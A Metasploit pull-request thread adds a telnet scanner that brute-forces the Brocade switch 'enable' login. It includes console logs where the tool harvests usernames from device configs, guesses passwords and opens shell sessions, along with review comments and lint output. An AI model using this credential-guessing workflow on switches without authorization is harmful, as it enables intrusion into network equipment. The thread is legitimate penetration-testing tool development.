### PR TITLE
Brocade enable command credential bruteforcer

### PR DESCRIPTION
**Pull request by h00die**
Per HDM, added new telnet login scanner module specific for doing 'enable' modules.
Added Bruteforcer for 'enable' command on Brocade switches.  After enable, requires username/password combo, which no current bruteforcers support.
Since Brocade isn't super popular, wrote a python emulator to test against. https://github.com/h00die/metasploit/blob/master/brocade_emulator.py

### CODE REVIEW

**Comment by h00die** [comment]
Ran against the python emulator:

msf > use auxiliary/scanner/telnet/brocade_enable_login 
msf auxiliary(brocade_enable_login) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(brocade_enable_login) > set user_as_pass true
user_as_pass => true
msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
pass_file => /passwords.lst
msf auxiliary(brocade_enable_login) > run

[*]  Attempting username gathering from config on 127.0.0.1
[*]    Found: username@127.0.0.1
[*]    Found: ttrogdon@127.0.0.1
[*]    Found: dmudd@127.0.0.1
[*]  Attempting username gathering from running-config on 127.0.0.1
[*]    Found: TopDogUser@127.0.0.1
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: username:username (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: username:12345678 (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: username:123456 (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: username:password
[*] Attempting to start session 127.0.0.1:23 with username:password
[*] Command shell session 1 opened (127.0.0.1:60089 -> 127.0.0.1:23) at 2015-03-06 20:05:57 -0500
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: ttrogdon:password (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: ttrogdon:ttrogdon
[*] Attempting to start session 127.0.0.1:23 with ttrogdon:ttrogdon
[*] Command shell session 2 opened (127.0.0.1:33204 -> 127.0.0.1:23) at 2015-03-06 20:06:47 -0500
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ttrogdon (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:dmudd (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:12345678 (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:123456 (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:password (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:passwords (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ports (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:admin (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:read (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ttrogdon (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:TopDogUser (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:12345678 (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:123456 (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:password (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:passwords (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ports (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:admin (Incorrect: )
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:read (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(brocade_enable_login) > sessions -l

Active sessions
===============

  Id  Type    Information                              Connection
  --  ----    -----------                              ----------
  1   shell   TELNET username:password (127.0.0.1:23)  127.0.0.1:60089 -> 127.0.0.1:23 (127.0.0.1)
  2   shell   TELNET ttrogdon:ttrogdon (127.0.0.1:23)  127.0.0.1:33204 -> 127.0.0.1:23 (127.0.0.1)

msf auxiliary(brocade_enable_login) >

**Comment by h00die** [comment]
Run against my brocade switch

msf > use auxiliary/scanner/telnet/brocade_enable_login 
msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
pass_file => /passwords.lst
msf auxiliary(brocade_enable_login) > set user_as_pass true
user_as_pass => true
msf auxiliary(brocade_enable_login) > set rhosts 192.168.50.1
rhosts => 192.168.50.1
msf auxiliary(brocade_enable_login) > run

[*]  Attempting username gathering from config on 192.168.50.1
[*]    Found: admin@192.168.50.1
[*]    Found: read@192.168.50.1
[*]    Found: port@192.168.50.1
[*]  Attempting username gathering from running-config on 192.168.50.1
[*]    Found: admin@192.168.50.1
[*]    Found: read@192.168.50.1
[*]    Found: port@192.168.50.1
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: admin:admin
[*] Attempting to start session 192.168.50.1:23 with admin:admin
[*] Command shell session 1 opened (192.168.50.2:57524 -> 192.168.50.1:23) at 2015-03-06 20:19:41 -0500
[-] 192.168.50.1:23 - LOGIN FAILED: read:admin (Incorrect: )
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: read:read
[*] Attempting to start session 192.168.50.1:23 with read:read
[*] Command shell session 2 opened (192.168.50.2:49223 -> 192.168.50.1:23) at 2015-03-06 20:20:32 -0500
[-] 192.168.50.1:23 - LOGIN FAILED: port:read (Incorrect: )
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: port:port
[*] Attempting to start session 192.168.50.1:23 with port:port
[*] Command shell session 3 opened (192.168.50.2:34683 -> 192.168.50.1:23) at 2015-03-06 20:21:23 -0500
[-] 192.168.50.1:23 - LOGIN FAILED: admin:port (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: admin:admin (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: admin:12345678 (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: read:port (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: read:read (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: read:12345678 (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
[-] 192.168.50.1:23 - LOGIN FAILED: port:12345678 (Unable to Connect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(brocade_enable_login) > sessions -l

Active sessions
===============

  Id  Type    Information                           Connection
  --  ----    -----------                           ----------
  1   shell   TELNET admin:admin (192.168.50.1:23)  192.168.50.2:57524 -> 192.168.50.1:23 (192.168.50.1)
  2   shell   TELNET read:read (192.168.50.1:23)    192.168.50.2:49223 -> 192.168.50.1:23 (192.168.50.1)
  3   shell   TELNET port:port (192.168.50.1:23)    192.168.50.2:34683 -> 192.168.50.1:23 (192.168.50.1)

msf auxiliary(brocade_enable_login) > session -i 1
[-] Unknown command: session.
msf auxiliary(brocade_enable_login) > sessions -i 1
[*] Starting interaction with 1...

show sessions ?
Unrecognized command
BR-telnet@FWS624 Router#show ?
  802-1w                 Rapid Spanning tree IEEE 802.1w D10 status
  aaa                    Show TACACS+ and RADIUS server statistics
  access-list            show IPv4 access-list information
  acl-on-arp             Show ARP ACL filtering
  arp                    Arp table
  auth-mac-addresses     MAC Authentication status
  batch                  Batch commands
  boot-preference        System boot preference
  buffer-profile         Displays active profile
  cable-diagnostics      Show Cable Diagnostics
  chassis                Power supply/fan/temperature
  clock                  System time and date
  configuration          Configuration data in startup config file
  cpu-utilization        CPU utilization rate
  debug                  Debug information
  default                System default settings
  dot1x                  Dot1x information
  errdisable             Errdisable status
  fdp                    CDP/FDP information
  flash                  Flash memory contents
  gvrp                   GVRP information
  inline                 inline power information
  interfaces             Port status
--More--, next page: Space, next line: Return key, quit: Control-c 
  ip                     IP address setting
  ipv6                   IP setting
  license                Show license information
  link-aggregate         802.3ad Link Aggregation Information
  link-error-disable     Link Debouncing Control
  link-keepalive         Link Layer Keepalive
  lldp                   Link-Layer Discovery Protocol information
  local-userdb           Local User Database information
  logging                System log
  loop-detection         loop detection status & disabled ports
  mac-address            MAC address table
  media                  1Gig/10G port media type
  memory                 System memory usage
  metro-ring             Metro ring protocol information
  mirror                 Mirror ports
  module                 Module type and status
  monitor                Monitor ports
  mstp                   show MSTP (IEEE 802.1s) information
  optic                  Optic Temperature and Power
  port                   Show port security
  priority-mapping       802.1Q tagged priority setting
  processes              Active process statistics
  protected-link-group   Show Protected Link Group Details
--More--, next page: Space, next line: Return key, quit: Control-c 
  ptrace                 Global ptrace information
  qd-buffer-profile      User configured buffer/descriptor profiles
  qos-profiles           QOS configuration
  qos-tos                IPv4 ToS based QoS
  radius                 show radius server debug info
  rate-limit             Rate-limiting table and actions
  redundancy             Display management redundancy details
  relative-utilization   Relative utilization list
  reload                 Scheduled system reset
  reserved-vlan-map      Reserved VLAN map status
  rmon                   Rmon status
  running-config         Current running-config
  scheduler-profile      User configured scheduling profiles
  sflow                  sFlow information
  snmp                   SNMP statistics
  sntp                   Show SNTP
  span                   Spanning tree status
  statistics             Packet statistics
  stp-bpdu-guard         BPDU Guard status
  stp-group              Spanning Tree Group Membership
  stp-protect-ports      Show stp-protect enabled ports and their BPDU drop
                         counters
  table-mac-vlan         MAC Based VLAN status
--More--, next page: Space, next line: Return key, quit: Control-c 
  tech-support           System snap shot for tech support
  telnet                 Telnet connection
  topology-group         Topology Group Membership
  traffic-policy         Show traffic policy definition
  trunk                  Show trunk status
  users                  User accounts
  v6-l4-acl-sessions     Show IPv6 software sessions
  version                System status
  vlan                   VLAN status
  vlan-group             VLAN Group Membership
  voice-vlan             Show voice vlan
  vsrp                   Show VSRP commands
  web-connection         Current web connections
  webauth                web authentication information
  who                    User login
  |                      Output modifiers
  <cr>
BR-telnet@FWS624 Router#

**Comment by h00die** [comment]
ran msftidy, and cleaned up some warnings.  made a commit + push, hopefully it made it to the PR (can't tell).

msftidy showed the following that were fixed:
root@kali1:~/metasploit-framework/tools# ./msftidy.rb ../modules/auxiliary/scanner/telnet/brocade_enable_login.rb
../modules/auxiliary/scanner/telnet/brocade_enable_login.rb:23 - [WARNING] Spaces at EOL
../modules/auxiliary/scanner/telnet/brocade_enable_login.rb:25 - [WARNING] Spaces at EOL
../modules/auxiliary/scanner/telnet/brocade_enable_login.rb:28 - [WARNING] Spaces at EOL
../modules/auxiliary/scanner/telnet/brocade_enable_login.rb:29 - [WARNING] Spaces at EOL
../modules/auxiliary/scanner/telnet/brocade_enable_login.rb:60 - [WARNING] Spaces at EOL
../modules/auxiliary/scanner/telnet/brocade_enable_login.rb:64 - [WARNING] Space-Tab mixed indent: "\t found_username = un.split(\" \")[1].strip\n"
../modules/auxiliary/scanner/telnet/brocade_enable_login.rb:64 - [WARNING] Tabbed indent: "\t found_username = un.split(\" \")[1].strip\n"
../modules/auxiliary/scanner/telnet/brocade_enable_login.rb:65 - [WARNING] Space-Tab mixed indent: "\t un_list.push(found_username)\n"
../modules/auxiliary/scanner/telnet/brocade_enable_login.rb:65 - [WARNING] Tabbed indent: "\t un_list.push(found_username)\n"
../modules/auxiliary/scanner/telnet/brocade_enable_login.rb:66 - [WARNING] Space-Tab mixed indent: "\t print_status(\" Found: \#{found_username}@\#{ip}\")\n"
../modules/auxiliary/scanner/telnet/brocade_enable_login.rb:66 - [WARNING] Tabbed indent: "\t print_status(\" Found: \#{found_username}@\#{ip}\")\n"

**Comment by todb-r7** [comment]
Please fix up the msftidy fails, detailed on the Travis build:

https://travis-ci.org/rapid7/metasploit-framework/builds/53351331

```
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/msftidy.rb ---
modules/auxiliary/scanner/telnet/brocade_enable_login.rb:23 - [WARNING] Spaces at EOL
modules/auxiliary/scanner/telnet/brocade_enable_login.rb:25 - [WARNING] Spaces at EOL
modules/auxiliary/scanner/telnet/brocade_enable_login.rb:28 - [WARNING] Spaces at EOL
modules/auxiliary/scanner/telnet/brocade_enable_login.rb:29 - [WARNING] Spaces at EOL
modules/auxiliary/scanner/telnet/brocade_enable_login.rb:60 - [WARNING] Spaces at EOL
modules/auxiliary/scanner/telnet/brocade_enable_login.rb:64 - [WARNING] Space-Tab mixed indent: "\t found_username = un.split(\" \")[1].strip\n"
modules/auxiliary/scanner/telnet/brocade_enable_login.rb:64 - [WARNING] Tabbed indent: "\t found_username = un.split(\" \")[1].strip\n"
modules/auxiliary/scanner/telnet/brocade_enable_login.rb:65 - [WARNING] Space-Tab mixed indent: "\t un_list.push(found_username)\n"
modules/auxiliary/scanner/telnet/brocade_enable_login.rb:65 - [WARNING] Tabbed indent: "\t un_list.push(found_username)\n"
modules/auxiliary/scanner/telnet/brocade_enable_login.rb:66 - [WARNING] Space-Tab mixed indent: "\t print_status(\" Found: \#{found_username}@\#{ip}\")\n"
modules/auxiliary/scanner/telnet/brocade_enable_login.rb:66 - [WARNING] Tabbed indent: "\t print_status(\" Found: \#{found_username}@\#{ip}\")\n"
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------
```

**Comment by h00die** [comment]
Had fixed, but hadn't merged to the right branch. Merge done, should pass now.

**Comment by todb** [comment]
Ah thanks! Looks like the latest commit passes so should be good for review
now.

**Comment by h00die** [comment]
Any word on when this may get reviewed?  I've started writing the post module to work with it, but was waiting to make sure this got accepted first in case there was something I missed.

**Comment by h00die** [comment]
A month past last comment. Any updates, or anything I can do to help this along?

File: lib/msf/core/auxiliary/login.rb [hunk 1]
```diff
@@ -35,7 +35,7 @@ def create_login_ivars
     #
     # Some of these regexes borrowed from NeXpose, others added from datasets
     #
-    @login_regex = /(?:log[io]n( name|)|user(name|id|))\s*\:/i
+    @login_regex = /(?:log[io]n( name|)|user( ?name|id|))\s*\:/i
```
Comment (bcook-r7) [inline lib/msf/core/auxiliary/login.rb]: Would anyone have a problem with generalizing the suffix/space handling like so?

/(?:(log[io]n|user) ?(name|id|))\s*\:/i

File: modules/auxiliary/scanner/telnet/brocade_enable_login.rb [hunk 2]
```diff
@@ -0,0 +1,150 @@
...
+
+  include Msf::Exploit::Remote::Telnet
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::CommandShell
+
+  def initialize
+    super(
+      'Name'        => 'Brocde Enable Login Check Scanner',
```
Comment (bcook-r7) [inline modules/auxiliary/scanner/telnet/brocade_enable_login.rb]: s/Brocde/Brocade/

Comment (h00die) [inline modules/auxiliary/scanner/telnet/brocade_enable_login.rb]: Do you want me to fix that and re-submit it?

Comment (kernelsmith) [inline modules/auxiliary/scanner/telnet/brocade_enable_login.rb]: @h00die just commit the change and push it, the PR will auto-update

**Comment by bcook-r7** [comment]
Looks good:
```
msf auxiliary(brocade_enable_login) > run

[*]  Attempting username gathering from config on 192.168.56.1
[*]    Found: monkey@192.168.56.1
[*]    Found: username@192.168.56.1
[*]    Found: cheese@192.168.56.1
[*]    Found: dianaross@192.168.56.1
[*]    Found: eleven@192.168.56.1
[*]  Attempting username gathering from running-config on 192.168.56.1
[*]    Found: algore@192.168.56.1
[-] 192.168.56.1:2325 - LOGIN FAILED: monkey:monkey (Incorrect: )
[-] 192.168.56.1:2325 - LOGIN FAILED: monkey:password (Incorrect: )
[-] 192.168.56.1:2325 - LOGIN FAILED: monkey:monkey (Incorrect: )
[-] 192.168.56.1:2325 - LOGIN FAILED: username:username (Incorrect: )
[+] 192.168.56.1:2325 - LOGIN SUCCESSFUL: username:password
[*] Attempting to start session 192.168.56.1:2325 with username:password
[*] Command shell session 1 opened (192.168.56.1:63219 -> 192.168.56.1:2325) at 2015-04-21 18:12:42 -0500
[-] 192.168.56.1:2325 - LOGIN FAILED: cheese:password (Incorrect: )
```

```
msf auxiliary(brocade_enable_login) > creds
Credentials
===========

host          service            public    private   realm  private_type
----          -------            ------    -------   -----  ------------
192.168.56.1  2325/tcp (telnet)  username  password         Password
```

**Comment by bcook-r7** [comment]
Thanks @h00die , the emulator was fun to play with too. I kept forgetting it wasn't real and wondering why traceroute wasn't working :P.

**Comment by bcook-r7** [comment]
Hi. Unfortunately we found some last minute issues with this module that cause problems when it is run outside of a msfconsole context. These would have been caught if we had added some specs for this module, but I overlooked it. See here: spec/lib/metasploit/framework/login_scanner/

I'm going to unmerge this module temporarily so we can add the missing specs and fix the problems running outside of msfconsole.

**Comment by bcook-r7** [comment]
I resurrected this feature branch at https://github.com/bcook-r7/metasploit-framework/tree/brocade-login-scanner-and-specs for now.

**Pull request merged**